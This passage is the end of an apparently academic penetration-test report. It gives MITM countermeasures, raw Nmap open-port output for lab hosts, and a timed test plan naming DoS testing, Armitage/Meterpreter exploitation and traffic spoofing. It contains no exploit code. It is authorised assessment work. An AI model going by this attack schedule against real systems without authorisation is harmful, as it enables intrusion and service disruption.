No countermeasures needed to be taken to secure the core business application. However, countermeasures need to be made to eliminate the ability to see what web or secure web traffic users are trying to conduct. Again, a NAC device would help qualify not on the user but the device on the network. In addition, the device can emulate MITM attack against attacker and take all their traffic into a black hole. Trustwave NAC appliance is one of these devices that can do this mitigation. A less costly approach for smaller companies would be to use a VPN or SSH tunnel to a known good server. Some of these solutions are offered free on the web and some can be made.

54



Appendix AA: MBSA (Microsoft Baseline Security Analyzer) Scan Results The automated scanning results are attached but abbreviated for length. Microsoft Baseline Security Analyzer Results (MBSA) results have been included below. The workstation used in the test had even a lower score for vulnerabilities discovered.

55



56



Appendix AB: Nmap Scan Results

Scanning known hosts Nmap MAXWELLSM (Application server Open Ports) Scanning 10.10.10.5 [1000 ports] Discovered open port 80/tcp on 10.10.10.5 Discovered open port 23/tcp on 10.10.10.5 Discovered open port 445/tcp on 10.10.10.5 Discovered open port 139/tcp on 10.10.10.5 Discovered open port 49154/tcp on 10.10.10.5 Discovered open port 49156/tcp on 10.10.10.5 Discovered open port 49157/tcp on 10.10.10.5 Discovered open port 49155/tcp on 10.10.10.5 Discovered open port 135/tcp on 10.10.10.5 Discovered open port 808/tcp on 10.10.10.5 Discovered open port 49153/tcp on 10.10.10.5 Discovered open port 49152/tcp on 10.10.10.5 Discovered open port 992/tcp on 10.10.10.5 _ssl-cert: ERROR 49152/tcp open msrpc Microsoft Windows RPC 49153/tcp open msrpc Microsoft Windows RPC 49154/tcp open msrpc Microsoft Windows RPC 49155/tcp open msrpc Microsoft Windows RPC 49156/tcp open msrpc Microsoft Windows RPC 49157/tcp open msrpc Microsoft Windows RPC ClientW7 (Open Ports) 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn 445/tcp open netbios-ssn 5357/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) |_http-methods: No Allow or Public header in OPTIONS response (status code 503) |_http-title: Service Unavailable 49152/tcp open msrpc Microsoft Windows RPC 49153/tcp open msrpc Microsoft Windows RPC 49154/tcp open msrpc Microsoft Windows RPC 49155/tcp open msrpc Microsoft Windows RPC 49156/tcp open msrpc Microsoft Windows RPC 49161/tcp open msrpc Microsoft Windows RPC

Appendix AC: Nessus Scan Results Application Server MAXWELLSM

57



58



59



60



Appendix AD: Nessus Scan Results Network

Appendix AE: Communication Plan The communication plan used during penetration test. This was a single pen tester performing the test so no other communication had to be coordinated with teammates. Time 08:00- 08:30 Target Devices and Services Have all identified targets of evaluation documented

61



Obtain and review prioritized list of services 08:30-09:30 Test Operating Systems

Call to operations manager test to begin 1 hour in length. Use Microsoft Baseline Security Analyzer Use Nmap to discover devices banner grabbing Use Nessus to discover vulnerabilities 09:30-10:30 Test Network Devices Call to operations manager test to begin 1 hour in length. Use Nmap to discover devices and ports Discover services DoS/DDoS Attack 10:30-12:00 Test Core Business Application Armitage & Meterpreter used. 13:00-14:30 Man in the middle: Call to operations manager test to begin 1.5 hour in length. Spoofing & Clear text traffic capturing 14:30-17:00 Contingency Testing, Report with Countermeasures Contingency testing in case one or more test open or deny success Provide results in a brief outlining the test and results Provide Countermeasures

effective penetration testing kevin pescatello a capstone ... · effective penetration testing...

Documents